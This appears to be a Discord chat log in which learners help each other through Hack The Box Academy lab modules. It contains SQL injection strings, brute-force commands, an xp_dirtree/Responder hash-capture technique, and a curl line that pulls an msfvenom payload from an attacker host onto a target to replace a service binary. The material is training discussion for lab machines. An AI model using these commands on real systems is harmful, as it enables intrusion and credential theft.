Did you get anything useful from SMTP enum?

nope nothing

ran it several times and added the -D for domain

although im suspecting i should get a user from it at least so I can bruteforce it

Yeah you have the right idea. I don't remember because I did this assessment a while ago, but was there a users list included in the resources of the module? If so, try doing your user enum with that list

thx mate ill try again

no problem, you're on the right track

Sometimes you need to slow your tools down to wait for a response

yup I think that was it cz I got it on a retry

i'm doing this module and i'm running into problems... nmap can't scan the network it literally can't find any hosts on that ip address what is my hosts file supposed to look like? https://academy.hackthebox.com/module/113/section/1088

└─$ cat /etc/hosts    
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

10.129.42.195 app.inlanefreight.local
10.129.42.195 dev.inlanefreight.local
10.129.42.195 drupal-dev.inlanefreight.local
10.129.42.195 drupal-qa.inlanefreight.local
10.129.42.195 drupal-acc.inlanefreight.local
10.129.42.195 drupal.inlanefreight.local
10.129.42.195 blog.inlanefreight.local

that's what mine looks like right now but i'm not sure if that's correct

Would anyone be fine giving me a helping hand designing a very very very easy and most basic network diagram based on the most basic of basic equipment requirements it should have

Try using just one IP and the hosts after.
10.129.42.195 vhost vhost vhost etc. etc.

this is what it looks like now ```10.129.42.195 app.inlanefreight.local dev.inlanefreight.local drupal-dev.inlanefreight.local drupal-qa.inlanefreight.local drupal-acc.inlanefreight.local drupal.inlanefreight.local blog.inlanefreight.local

Hello, could someone help with exercise 1 of the Predictable Reset Tokens - Broken Authentication module?

I can't get the script to return the correct token. I've already read the previous hints on this forum.

@rustic sage Try pinging or 'curl -I' one of the hosts i.e. dev.inlanefreight.local to test

curl: (7) Failed to connect to dev.inlanefreight.local port 80 after 3101 ms: Couldn't connect to server

strange because

i feel so dumb i didn't bother to check the vpn... the thing crashed!!!

ooops

It happens. no worries.

<@&486603600085123073> I'm on Attacking Enterprise Networks. This is triggering when I go to support.inlanefreight.local the rest of the vhosts are normal. Just an FYI.

Are you typing it in right? Because this is redirecting

The URL is in the SS.

I'm working through the footprinting module and trying to anser the question in the SMB enumeration section

The question that I am struggling on is: Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.

not sure if i understand the question

or is it thaat I will understand the question once I find the answer 😄

Connect and enumerate 🙂
***client > ********enum > Version will be obvious

version

i already enumerated the version of the server

The wording on that question isn't the greatest...
It's not the version of the server, but the version of a service..

smbclient or rpc might be good for finding it out

using

netsharegetinfo <SHARE>

to further enumerate the specific share

enum

i believe it's also case specific

case specific?

hmmm found a bunch of completions for enum.... in rpcclient

as in Linux is not linux

ah yes

i do get output relating to the share by running netsharegetinfo

wowie wow i am officially 50% done with the infosec fundamentals path 😐

well done!!!

keep going 🙂

ok what format is the answer in

it's not a flag i suppose?

Nope

ok so more info than before

i can't wait to get the fuck out of school so i can actually start focusing on this

well rpcclient command netshareenum <sharename> does giive more info

i don't get from the question what extra nfo is being asked for

sorry no

Custom version

i mean netsharegetinfo

I'm sure I..freight isn't an official version

I already submitted the version for that

didn't seem to take

ok i needed to submit the whole thing

Yeah lol

i think the supplying the format of the answer might have been useful there

custom version

one of the first things i did was submit the different version

i just supplied x.x

:)

Always try everything for the answer before ruling it out

okidoki

thanks!

time for bed

Attacking Common Services
-> Attacking SQL Databases

im stuck at the first question.

i logged into the given htb credentials with impacket mssqlclient.py
listing all DBs with enum_db

need a little hint from now on

whats the question?

what is the pw for mssqlsvc user

I need help with password attack pass mutation module

after listing the databases make queries on them - avoid default databases

try & find credentials

i have no permissions to read teh relevant dbs
||ive read something in the forum about capturing a hash with a fake smb share, i might look into this.||

make sure not to say too much in this channel without blocking spoilers

(|| ||)

this is a whole other topic, look at the course you just read and see what it has to say about initial access

Do you know how to list the tables of the databases?

yeah that works just need to find the correct table and database

this also works as well select * from tablename;

Did you try stealing?

Depends if mssql or mysql

yeah true i just thought it was mssql

mssql

But he's gotta be the right user to see the right table

im trying the catching ntlm hash but im not getting an event on responder

Is responder running on the right interface?

tun0

And you're having it do the xp..dirtable //ip/share yeah?

okay, as always.... i redid it and it worked, might have had some syntax error xD

xp_dirtree

Oh yeah been a min

3:17 AM
this might be the cause 😒

ah the issue was i did it inside of apostrophe ' cmd '

this was an very interesting section, crazy how harmful it can be, that the DB can access remote shares via SMB

The destination machine does not load, does this happen to anyone else?

Target is Spawning

Thoughts on arch Linux

someone?

A few minutes ago I was seeing machines not load either. Logged out and back in and it let me spin one up again.

Hello everyone,
Just to be sure there is no issue on my side. The target stuck on "Target is spawning..." on the Attacking Enterprise Networks module. Is there any potential issue for which I'm maybe not aware please?

refresh the page and try to spawn again

I did it many times even by changing the browser but it didn't work unfortunately

I can spawn it, eu-2

Yes you are right. It's working now. After a reboot. Thank you very much.

getting started
knowledge verification
I am trying to escalate privileges to root with the file /usr/bin/php since it is the only file with which I have all permissions but I cannot modify the content of the file, nor edit the name of php to example.sh
I have tried other methods with other files but I have permission denied
Can someone who has done this module give me a clue please?

https://gtfobins.github.io/gtfobins/php/#sudo

Hi All, im in the Analyzing Evil With Sysmon & Event Logs module and am getting into the windows vm's ok. The module requires me to download stuff from the internet but there is
internet access on the vm's.

I've already changed the pwnbox location a few times

how did u solved it? im currently facing the same error

can i still access my modules i finished in the academy even though i cancelled my subscription ?

Yes, all 100% completed modules belong to you

What really that's awesome 😎

pls can someone help me with Password Attacks Lab - Medium. I'm trying to crack for 3 days and 3 nights now and Im getting no where. Ive tried. and after trying smb2 it just says. Ive also tried crackmapexec but its not providing any results. I've tried cracking ssh and smb but i dont know what Im doing wrong anymore please someone save me

I havent found any user's credentials or anything I've enumerated and found that ssh and smb is running and i couldnt crack 😭

i tried to install the libsmbclient support module for my hydra so it can support smb2but it failed and i used pwnbox but it also doesnt have the hydra module installled

i dont remember what i did but there is no smb2 its only smb

did you use crackmapexec to crack?

im pretty sure i used hydra but i dont remember

why is it saying i dont have oepnssl support let me recheck rn im unwilling

Heh

that idk

I think hydra is wonky I had to load hydra in with certain modules before I could crack smb

ok i will try and load more modules

Like complete reinstall with the libsmb-dev module

Because smb wasn’t supported

maybe restart your pawn box

im using my own vm but i tried pwn box and it was the same thing

restart the machine?

ok let me try

see. Why is this happening 😭

wait its not smb? or wrong port??

maybe run a nmap scan and see whats open

no its open 445

it might rlly be smb2 it says it in the host script results

yeah it is smb version two but there isnt a command on hydra for smb2

well smb 4.sum sum

Cme works iirc

i rlly want it to but its not

read your hydra error and it will reveal all you need to know

"target does not support smbv1"

can anybody help me understand why im getting this message

module file upload attacks and section type filters

I'm attempting the Password Attacks module, Pass the Ticket (PtT) from Linux section, "Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory. " question.

|| I managed to impersonate svc_workstations to gain access to \dc01\svc_workstations, but the flag in flag.txt does not look right to me.|| Can anyone tell me what I missed or am doing wrongly?

yoo anyone having issues with Attack Tuning -> SqlMap module, flag5 issue? I've literally got the flag from the output flag5, but its incorrect apparently

@zinc nimbus I used metasploit to crack SMB hydra doesn't always work right for SMB

I just finished this lab like 5 hours ago

should be the home dir in the linux target, not dc

hi everyone! I was wondering if anyone could nudge me on the last question of the skills assesment of the game hacking fundamentals module

i've identified the score in the data structure, but everytime i change it it reverts back to the previous score

i've tried seeing what opcodes write to the value, but it isnt rendering any results

any help would be greatly appreciated 🙂

hi, all. I have to bother you with a noob question: I'm at https://academy.hackthebox.com/module/77/section/726 atm. I try to brute-force bobs smb password with crackmapexec. I crafted the coorrect prompt but I don't use a wordlist containing the actual password. The hint says 'Bob likes to use weak passwords.' What wordlist should I use? Is the hint pointing to a specific one? Or should the password even be 'guessable' by hand?

for anyone wondering in the future, the hint recommends to rerun multiple times for correct output. Make sure to delete the the dump in sqlmap/output as you rerun command. You may get the wrong flag a few times but it should return with the right one eventually.

appreciate the push, got one step closer!

nevermind got it 😄

Re-read the "Shares" section of that page carefully.

omg thank you! anohter reminder to read everything carefully. ❤️

I think it was the way burp suite saves the request i just manualy pased it to a xxe.req file
with sudo vim xxe.req

the game fundamentals module was really cool! Academy rocks 🙂

well now I don't remember what I wrote

I'd appreciate that mods would've move the message upon deleting the thread :/

@autumn pilot

VM's are messing up lol

Well anyway I'll try to ask again, I have a problem on the skill assessment for file upload module, I successfully uploaded a file and got /etc/passwd content but can't get the flag.txt file, tried to get a reverse shell through msfvenom, it uploads successfuly but kills the connection instantly when my nc is listening, hopefully somebody can help a bit

Do you have command execution through your upload?

nop

you need to upload something that gives you command execution

I do upload the reverse.php file crafted with msfvenom the upload successfuly work

you sent an xml payload to read /etc/passwd?

no

I used xxe payload with file:///etc/passwd

you're doing the file upload module?

yes

there's no xxe in that module

well there is but

whether it's with xss or xxe I still could read the /etc/passwd which is a good starting point to me

and it was xxe for me

yeah you're right

but I can do it with xss too tho

so you got it with the xml, you said no at first

oh I read that too fast

mb

I upload the file with an xss payload through a JS function that call for the reverse shell on my server

there could be protections in place to prevent that, so you'll need to find another way

you don't do it via revshell

so it means something is killing the connection when I try to rev shell ?

i'm not sure, i didn't do it that way. i don't think it's intended to get a shell via msfvenom

Is there some kind of shell involved or should I only try to read what's stored on the server ? because if it's the second one I never succeed in reading other file at the same root folder level

theoretically if you have command execution you should be able to get a shell, but if you have command execution to run msfvenom payloads, just read the flag instead

yeah maybe I overthought this but I dug down the rabbit hole because I thought it was interesting to try to go further and learn how it work so I could use it elsewhere later in my career

by using other techniques

ok but you can execute commands right

so just get the flag for the skill assessment

you can practice that other stuff that's fine, but there may be other protections htb has in place to prevent that

that is true

Whats wrong here subverting query logic / sql injection fundamental module

SELECT * FROM logins WHERE username='tom' AND password = 'admin' or '1'='1';
SELECT * FROM logins WHERE (username='admin' or '1'='1') AND (password = 'something' or '1'='1');
SELECT * FROM logins WHERE username=" or '1' = '1' AND password = " or '1' = '1' ;
i tried everthing

yeah my bad i should write only tom OR '1'='1'
becasue the select for part already written

For the Attacking Enterprise Networks module. How do these two internal subnet ranges make sense? The 172.16.9.0-255 IP addresses are part of the 172.16.8.0/23 subnet.

Module: Password Attacks
Subsection: Protected Files

Question: Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

My inquiry: where in the heck is Kiras password

😄

nvm

i think the vm was messing up earlier

someone sent a message in general that crashes discord, wtf

any mods around

Hi guys. Can someone please help me on the attacking SQL databases section of Attacking common Services module?

I have connected to the database as htbdbuser using smqlcmd, and I am trying to force it to authenticate to responder and steal the hashes user the xp_dirtree funtion but can't get it to work.

Any help? these are my commands, I feel like I am on the right lines, as I don't know how else I would gain the pw.

sudo responder -I tun0

2> GO```

link?

nvm bugged session

RedTeam Tips: Orchestrating Chaos, Evading Defense Culture
https://twitter.com/Hadess_security/status/1781264096001761606

when i get this error i took a break and when i tried again it works i am pretty sure its from how burp suite deal with files
however thanks for help bro

Guys does penetration testing job role helps to improve capture the flag skills or do I need to take bug bounty path for CTF skills just confused let me know

@cloud urchin coming back to you I actually don't execute command through XSS payload, I successfuly found the upload dir which is nice for what I want to do but can't wrap my head around how to upload a .php file that could successfuly execute my commands

though I don't know the way I interprated your message but XXE vuln allowed me to read the content of the upload and submit web page that allowed me to know what's the upload dir

Can anyone give me a hand with this question?

Password Attacks ---> Windows Credential Hunting

What are the credentials to access the Edge router (Format: username:password, case sensitive).

https://tenor.com/view/that-is-messed-up-gif-9714963639675861025

<@&861185840277487616>

LOL

And when I upload a php command through my xss payload It’s not interprated compared to js code (tried with alert(document.location) )

DM me if oyu still need help

Have you investigated all the apps on the desktop?

who is the owner of the website?

Hello guys,

Attacking Common Services - Attacking SMB

When I connect to SMB, I cannot read or download the id_rsa file and when I ssh, I get a permission denied error. What can I do?

which question are you on

What is the password for the username "jason"?

https://academy.hackthebox.com/module/116/section/1167

I'm working on the FFUF module skill assessment where I'm supposed to fuzz a page that says You don't have access!. I'm guessing I'm meant to use a regex matcher (-mr) for this.

the command I've been using is ||ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -w academy-htb.subdom.txt:HOST -u http://HOST.academy.htb:49584/FUZZ -recursion -recursion-depth 1 -ic -v -mr "You don't have access" -e .php,.phps,.php7||, which I'm now guessing is too broad, because my problem is that the target machine is up for 90mins and my ffuf scan takes too long; it doesn't even finish the first scan (before recursing). Should I be using a different approach?

did you try bruteforcing his password with the module's provided password list?

I'm waiting for it to finish, but when I typed ssh jason@ip it gave me an authorization error without asking for a password.

what command did you use

cme brute force

rackmapexec ssh 10.129.203.6 -u jason -p pws.list

don't forget the --local-auth option for non-domain joined computers

I think we do not use this command when doing brute force.

while doing brute force

no, you use the command when it's a non-domain joined computer.

has nothing to do with brute force

it has to do with the logon method, which is important when you're brute forcing logging into something

understand

trying

crackmapexec ssh 10.129.203.6 -u jason -p pws.list --local-auth

ssh is slow

remember you're on the attacking smb section

im try hydra but not working

yeah you can't brute force ssh.

use crackmapexec like the module shows you

yes but I couldn't read or download the id_rsa file so I decided to try ssh

what was in the shared folder

im looking at this i dont think you brute force his pw here

but there's a share you CAN read, is there anything in there that may give jason's pw away?

.

well the hint says this A colleague has shared with us a password list that we can find in the resource. He was able to compile this during his research.

aaa

understand oky

im trying smb not ssh

ok i double checked im right

found cred

yeah use smb, dont brute force ssh

nice

oky oky thx

Hi All, im in the Analyzing Evil With Sysmon & Event Logs module and am getting into the windows vm's ok. The module requires me to download stuff from the internet but there is no internet access on the vm's.I've already changed the pwnbox location many times. Please help.

what is the module asking you to download

first sysmon then Sysmon configuration file downloaded from https://github.com/SwiftOnSecurity/sysmon-config.

there is no net acess though

no matter which country i connect to

i think it might be broken

it's not asking you to download that though

it's already on the machine

yes i checked that sysmon already is

and all targets you spawn will have no internet access

ah ok

i was not aware

so i ahve to find this git hub gile somewhere

*file

it should be easy to find

thank you

search for a sysmon config file (that is what is on the machine)

thanks again, ive been at this like an idiot

of course that makes sense

Hello Guys,

ATtacking common service - attacking sql databases,

im connect the sql server but not working my command

Need to select the DB first

I want to list the databases but I don't know what's in them right now.

or

wait, youre doing q1 or q2?

q1 q2?

there's two parts iirc

https://academy.hackthebox.com/module/116/section/1169

Yeah, there's two questions

yes

So are you doing q1 or q2? looks like q1

q1

Right

q =question

right?

so you shouldnt need to do any of those commands

i dont understand

Try the commands from the "Capture MSSQL Service Hash" section

oky

😐

I couldn't run the commands he gave me.

I would say if you're running the commands with the IP that is hosting the sql database then you have misunderstood the section and need to go back a reread what it is actually telling you. You need to capture the hash.

Gotta start reminding myself to read the questions fully... Spent days trying to exploit something for sudo rights abuse and turned out they just wanted to know what could be exploited...

In the Password Attack module, hard lab. Did you try to mount .vhd in linux?
I use VM, so i attach in windows
https://learn.microsoft.com/en-us/windows-server/storage/disk-management/manage-virtual-hard-disks

No connection possible

Today i get the error Timers: ping 10, ping-restart 120 when i try to connect to the academy.
I try diffrent VPN connections nothing works.

Have today any other problems?
On the top of the site are a massage box
Exams VPN Scheduled Maintenance eu-academy-exams-2 eu-academy-exams-2 should not be used on 23/4 (10:00-11:00 UTC). Please use eu-academy-exams-1
Are this the reason? (i try difrent connections and it is the wrong day)

I'm on the amazing module Introduction To Splunk & SPL

"Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

I hear this question is misleading.

I've played around with Range but the existing example in the docs sucks. Any discussion around range for SPL is about setting timeframes. Any help here?

I've used Bin for a 10 min timeframe but I think they want a rolling window

It's possible to mount in linux

Above those lines do you see "initialization sequence completed"?

That's not an error btw

i cant ping the lab

Message support then, as you said it's on every vpn

¯_(ツ)_/¯

ok

yes, its only like 3 commands to do in linux

Hello, I had a question about the Nessus labs. Am I suppose to install Nessus on my kali box and scan the vm? It tells me to scan another box that it has access to. I am confused on what to actually do. It's not very clear

I can SSH to the box, but I am not sure what to do next.

rdp in, go to the nessus web login, there's already a pre populated scan for the skills assessment

Is it alright for me to host my module notes on my Gitbook? Or is it against HackTheBox Academy's terms of service?

As long as they're not public/revealing content

hello guys im stuck at the last step in web attacks-skill assessment but for some reason the xxe dosent seem to work nor the xxeinjector i'd be glad for any info

Understood. Thanks!

Hi

hey can I view directories with store XSS

Hmmm...?

You can use stored XSS to redirect someone to an exploit that'll let you view everything...lol

I don't have access to that just stored XSS that only I can view im trying find a way do some like cat

Does anyone know why I'm getting this error while using enum4linux to enumerate smb shares using a hosts file. If I do it one (IP) by one, it works.

I mean if the lab is set up to run any script uploaded... You could probably pop a shell.

If we're talking in the wild, you need to wait for a user to execute the payload.

rightr

I need a nudge for "AD Enumeration & Attacks - Skills Assessment Part II". I was able to get a shell on SQL01. I am not sure how to proceed after that.

hi, can anyone help me wiht Windows Privilege Escalation Skills Assessment - Part II?

im waiting for ages, also tested with google.com but i dont get anything, nor an error

check privs

What tool can help me with that?

https://www.lepide.com/blog/8-different-methods-to-identify-privileged-users/

Or Bloodhound.

Found the command that helped whoami /priv

You said tool... Not command.

There's more arguments needed for subbrute

Hot wings.

😐

Thanks...I didn't even know what command/tool I was looking for. Was just so stuck.

hey everyone i'm doing Login Brute Forcing - Skills Assessment

on this question

Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

i got the user name and the password for the admin login page but when i login it re-load the page and doesn't login to the page

No worries man. Just saying a lot of us in here become more literal the more we interact with computers.

It's the exact same page?

like got access to the normal login page and then got the first flag and then when i try login to second one because there is a path for the admin page so when i try to login it re-load the page like i'm just re-fresh the page no result

Does the login work?

for the admin login page no

i can show if you want

How do you know the creds are correct?

Can't, I'm in a crappy signal area.

oh ok but i did use hydra and gave me the username and password but idk why it's not working

Clear your cache.

Are you using the IP, or did you assign it a domain?

Try both domain and IP.

Try a different browser. Try pwnbox.

i did

Reset the box?

i did reset and used pwnbox

Last resort is to use curl or burp to see what it says.

i did it also and nothing works because that was my first idea

Damn... That's weird.

yeah lmao

Maybe use Burp to brute force instead?

same result like i did everything you can think about

Dayum.

@fathom pendant he needs halp.

I haven't done this module

you can see the community-help

Don't ping me. If I'm actively not helping I'm either busy or don't know enough to assist

Understood.

the name login brute forcing - Skills Assessment

anyone can help me with first question in Windows Privilege Escalation Skills Assessment - Part II?? (Find left behind cleartext credentials for the iamtheadministrator domain admin account.)

/etc/hosts file has the xss.htb.net but i dont get the webpage

Use the hostname instead of the IP address.

put http://xss.htb.net in browser

or is it https://xss.htb.net/

oh thanks

that worked

\o/

just finished AD enum & attack. kinda rude how they onlt had PS 1.0 on there lol

lol

is that the hard one

ADCS attacks

No

It's a different module

ok

congrats

ADCS was really fun and really well put together

nice will be excited when I get there

for Johannas password, is 30 hours normal to brute force it?

module: password attacks lab - hard

Nope

Use small lists first, and not against ssh

yup, used the given list against rdp

using mutated now with crackmapexec

Attacking Common Services
DNS

what i tried so far and cant get any further
||dig any inlanefreight.htb atIP
here i find the nameserver, which i add into resolvers.txt
ofc is inlanefreight.htb in /etc/hosts
./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt||

The only thing that should be in resolvers.txt is the box you spawn at the bottom of the section along with the question

okay, i tought the ns

in this module, the box you spawn is acting as the nameserver.

okay, so no need to get ns.inlanefreight.htb from dig

i don't think you need to modify /etc/hosts at all, and just use the IP you spawn in resolvers.txt and you sohuld be able to complete it

Yep

okay got the flag, i just hate dns stuff xD

Can someone help me with the Windows Privilege Escalation - Weak Permissions. I keep trying to replace the binary with msfvenom and everytime I try to send it over I keep getting these errors: 10.129.225.128 - - [19/Apr/2024 15:12:48] "GET /service.exe HTTP/1.1" 404 - worked fine in the previous module.

404 error means it can't be found on the web server

I understand that. I don'

check the folder location where you're hosting the server

It's there

make sure your msvenom payload is in the same directory

make sure the name is correct

Yeah, i've done that, tried moving it into different directories, renamed it ect.

also 10.129.225.128 doesn't look like a HTB vpn IP to me. is that your tun0 IP you're hosting the file on?

Target: 10.129.225.128

there really are only a couple of things that will cause it to 404. it can reach the ip you're giving it, but it can't find the file there. so you either have the wrong ip, wrong file, or the file isn't in the directory you're hosting the http server on.

if it's there it wouldn't be a 404, take a look in your brower

Yeah, its not there. But it's in the directory I am currently staring at in my terminal lol

SecurityService.exe bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 lost+found media mnt opt proc root run sbin service.exe srrstr.dll srv sys tmp usr var vmlinuz vmlinuz.old

what is your tun0 ip?

10.10.15.73

...you placed it in your file root?

and that's the ip you're running the web server on?

Yes

put it somewhere else and start the server there, in tmp maybe

and I have placed it in different directories just to see if I was getting the path wrong

why does your GET command say it's reaching out to 10.129.225.128 if you're hosting it on 10.10.15.73

can I dm someone about zephyr pro lab?

I'm trying to retrieve it from the target.

which is 10.129.225.1285

10.129.225.128*

no, you're trying to download it to the target... aren't you?

10.10.15.73 - - [19/Apr/2024 15:20:09] "GET /service.exe HTTP/1.1" 404 -

why would you want to retrieve your msfvenom payload from the victim machine to your host machine? that doesn't make sense

maybe i'm just confused

curl http://10.10.15.73:8080/service.exe -O "C:\Program Files (x86)\PCProtect\SecurityServie.exe"

That is what Im using on the victim machine^^

from powershell

what's your web server command

python3 -m http.server 8080

and it would probably be better to do what Xre0us suggested and try hosting it out of tmp or something

Ok, I have a dedicated folder for HTB stuff I tried retrieving from first but i'll give her a try

there are other ways as well, scp, smb server, xfreerdp and remmina can both share folders very easily so you can xfer via the gui

It worked!

afaik when launchig http.server from python the root directory is where its started from

noice

Thanks guys!

Same module, now everytime I try to start the service to trigger the reverse shell in my listener I get this on the target machine: The service did not respond to the start or control request in a timely fashion.

The section Login Form Attacks should help you. You haven't posted anything you have tried so I can't get any more specific.

Why are you trying to create a revshell?

instead of creating a rev shell, keep it simple and just escalate yourself to admin

Be nice to practice doing so

nothing wrong with that and it should work

oh wow a whole new module appeared

https://academy.hackthebox.com/module/details/253

sick

im already stuck behind, there are so many modules xD

Oh that looks like a fun module

is this normal for the mutated list over rdp

password attack lab - hard

probably. looks like you're using low thread count too. if you're bruteforcing RDP i would recommend crowbar, it's faster.

That seems a little slow. 🙂 increase threads if you're using hydra. -t

crowbar go brrr

thats at 64

what protocol are you running it against?

rdp

crowbar would have had it cracked by now

Attacking Common Services
Email

i found a valid user via enumeration
now i try to brute this account via hydra on pop3, imap, smtp with the given pws.list from resources, but got no valid password. Do i need to make a mutated list, even tho it isnt mentioned in this module?

question 2

no, you don't need a mutated list.

oh i think i know what might be the issue

You need the pw list from that module

my format is wrong
username
username@inlanefreight.htb <---- this one

is there one for that module> I used rockyou lol

got the creds now

men always i make stupid mistakes

https://tenor.com/view/bob-ross-happy-accidents-gif-7215839

yes

damn lol

||crowbar -b rdp -u johanna -C ~/Desktop/Password-Attacks/new_mut.list -s 10.129.202.222/32||

is that good?

did you run it? or asking?

running it

hi I need a hint in the right direction. this is for hard lab on footprinting. I enumerated ssh and I see that its an Ubuntu server. I enumerated ssh with SSH ssh-audit.py and my results aren't very meaningful

what am I doing wrong here? do I try other ssh audit stuff?

I did nmap scans already which is how I found ssh is open

but don't have password which is my issue

I also see its aes encrypted so hashcat isn't gonna do it and neither is bruteforce right?

I had an issue with this earlier this week.

sucks that i cant do anything else while its running

Did you do a udp scan on nmap ?

I did not do UDP scan I did a regular scan

to get open ports

thats where the creds are

ok

why not? tmux/screen, or ctrl+z and typing bg, or a second ssh window doesnt work?

why udp scan? I don't understand

aren't udp scans super slow?

do I need to do udp scan on ssh?

i dont want to totally spoil it for you but i will give you this: https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

no i mean in terms of progressing through the module

you get creds from there and then everything makes sense

what did you learn in the module that is UDP?

@ me if you get it. I am going to the store for awhile. bbl

what program do you use for taking notes? i want to switch form my .txt to something more modern UI based

I use notion

Hey guys quick question how do you ssh to a target with the user and pw?

obsidian, there are others like notion, onenote

ssh [user]@host

thx ill have a look into them

A question. Please how can I find the reflective.dll file on the machine?

i'm using obsidian, i find it decent.

Okay I did it how you said, and it keeps saying connection refused for this question. For the Bind shells module

ss?

Anyone help me for injection attack

no space

ssh htb-student@10.129.218.204

it still refused the connection for some reason

you can ping the box ?

and port 22 is open ?

Are you connected to the HTB network via the VPN?

🤦🏾‍♂️

I forgot to connect, thank you guys

Happens.

Everything works now

magic

Please how can you find the reflective.dll.x64.dll file on the machine. Im stuck on the part where you are supposed to rename the dll file. Thank you

C:\Tools

i need help in FILE inclusion skill assement , i have found flag but i can't get the cat output from the flag , ping me

Hi all, working on the "web fuzzing" module's skills assessment and need a sanity check. I've started the machine, configured my hosts file to point 'academy.htb' -> IP ADDRESS. curl -I IPADDRESS:PORT to verify it's up, curl -I academy.htb to verify my hosts file is configured correctly, and grab the host header as well. Question 1 asks me to perform vhost and subdomain enumeration on the target. I perform subdomain enumeration, then vhost enumeration, nothing is popping out at as indicating next steps. Given the above does it look like I'm missing something?

how long should it take, its been going for an hour

a minute or two iirc

you using the correct wordlist?

nvm i found other ways to get that

mut_passwords

i am seeing many people stuck in password modules now a days 🤔

use the one provided by the module

its why we're in training 😄

Thanks you, I was over complicating it.

nah i solved that modules fast even though i am also noob

didnt work for rdp

||crowbar -b rdp -u johanna -C ~/Desktop/Password-Attacks/password.list -s 10.129.202.222/32 -v||

oops sorry was thinking of a different module, yes use the mut_passwords

over an hour is normal?

no and it should be near the top of the mut list if you did it correctly

i removed the duplicates, the list went from 180k to 90k

does capital or lowercase j matter in her name?

Hello everybody 😄 , can someone help with RDP bruteforce ? On password attacks, i got 3/4 flags, but the RDP one seams to not work , crackmap doesnt have anything , and hydra a lot of false positives ..

Is there a better place to ask this question?

Nope

This is the right channel

||crowbar -b rdp -u Johanna -C mut_password.list -s 10.129.202.222/32 -v||

ok

something wrong with your list?

its exactly what i typed and mutated a fresh copy of the given lists

i did the mutation that they gave in the cheatsheet

wc -l mut_password.list should give you 93912

i got double that lol

this was before but i ignored it because false positive

then you did it wrong, go fix it

i did the command from the cheat sheet

The cheatsheet is missing the | sort -u

😮

curse word!

Unless they updated it

It was missing last time I checked it

its missing lol

Any updates on rass issues posted bout it last time

Like I said from the cheatsheet

That's from the section itself

?

oh well i dont know how to read

It's OK. It's why you're here

reassuring

once more into the breach

worked

https://tenor.com/view/wonthedoit-hallelujah-praise-god-dance-gif-9662937157261668880

have fun with the rest of that lab....

Can someone help me in the Pentester Testing module, Footprinting smb section, there is a question that I can't find the answer to.

cant u get this with nmap -sC -sV

I'm doing Module 211, section 2276: SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)

I performed all the steps and the timeframe mentioned in Mar 5, 2023 to now. The question asks me to input the common date when all events were created.

However, the creation date is before Mar 5, 2023 and I've tried creating the dashboard multiple times with different time fields, yet the answer is same. What should I do?

im going to prove it thx

there's a handful of techniques in the reading give them a try and report back

Try enum4linux
Lost my notes so i cant confirm for sure 🙄

I thought I would not have internet and did not use it, but when I said that I tried the enum4linux-ng and I instantly got the one I was missing, thanks.

any other date fields you can go off of like @timestamp?

I tried event.created and event.ingested yet the issue persists. It gives a date which is before Mar 5 2023 and hence the answer isn't accepted.

Just played with the module, seems like something wiht count() is screwing with the date as it's forcing it to the first day of the week, if you mess around with that it will show the actual date

Ahh okay. Will try. Thanks dude

i have the dumbs, you can just add whatever time field, edit it by clicking on it and changing it from weeks to days... but anyhow you can just use the interface itself without editing anything, the date is right there

0-2 for those keeping count

I've found the exploit but when i run it i get nothing back

new module

any help greatly apprecaited

any help

which module ?

Attacking common applications

did you find the first answer ?

yes

thats how i was able to find the RCE

HTB CADE certification?

did you try to get a revshell

yea, not sure why its not working

Thanks, it worked. Apparently, there's something wrong with Elasticsearch because I had to refresh the Dashboard multiple times to then get the result and it was indeed... dumb The dates changed multiple times.

well you found the CVE

but the application is it hosted on linux/win ?

windows

so the problem from the payload you use

i used this https://www.exploit-db.com/exploits/48971

I use one from this https://www.revshells.com/

did you setup your listener because , I got hit using this

listener is on

try to remove the single quote -Uri http;//ip:port"

that worked but connection died

yees kow try to put rev shell paylaod instead of ping yourself

this just for testing that the vulnearable exists

thanks

even if i base64 encode the payload its not picking up

Hi all

I'm currently on the Hard lab for Password Attacks, I've tried a few things to get past where things are at and I've hit a wall.
Cracked the RDP password for Admin but can't connect via RDP
And the password doesn't work for the file needed, I'll avoid spoilers.
Can anyone give me some guidance on this one?

@high reef I used the bas64 payload from this

What error for rdp?

thats what i was using

Doesn't connect at all, I checked the Admin account groups and it should be RDPing in. Perhaps the password from the mutated password list is wrong for the Admin account? But hydra looks to have a correct match

Dm the password

It should work just check the port and the ip

it was delayed

thanks for your help

No that's not correct. I'd double check your steps for cracking and possibly your mut_password list, should be about 93000 lines long

hmmm i'll try it again, thanks gubarz

@shut quest I get 94044 from wc -l

That's correct

for the web attacks Bypassing Encoded References, what other method would have been easier to do to accomplish that section bc i made a whole python script then used curl to download all of the pdfs

still the problem i did everything it even gave me new user name and password and i tired them and nothing works

on this question:
Login Brute Forcing - Skills Assessment
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

i tried curl and nothing

What steps in the section I mentioned did you try?

service scanning... the hint is 'bob has a weak password'.. i tried spraying smb and telnet, i see tomcat am i meant to be exploiting this for a shell or am i overlooking something super simple..

Just reading the question, my assumption is that you should be connecting to one of the SMB shares. Have you tried using his name as the password?

yes but not uppercase hold on.............

nah still cant get in.. tried Bob, bob, Bob!, bob1 etc

using GS-SVCSCAN/bob

do these labs still have account lockouts? should i try reset

Injection Attacks: Skills Assessment
I've found the PDF Generation vulnerability and am looking to read the source code of the internal site. Can anyone send me a message to help with that?

WHITEBOX ATTACKS - Privilege Escalation

I feel like a newb having to come out and ask for help on the first question, but I inserted the payload they provided, got the 400 error and tried to visit /admin, but I still get redirected. Am I missing something here?

I am confused about the module "Windows Privilege Escalation" - "Initial Enumeration"
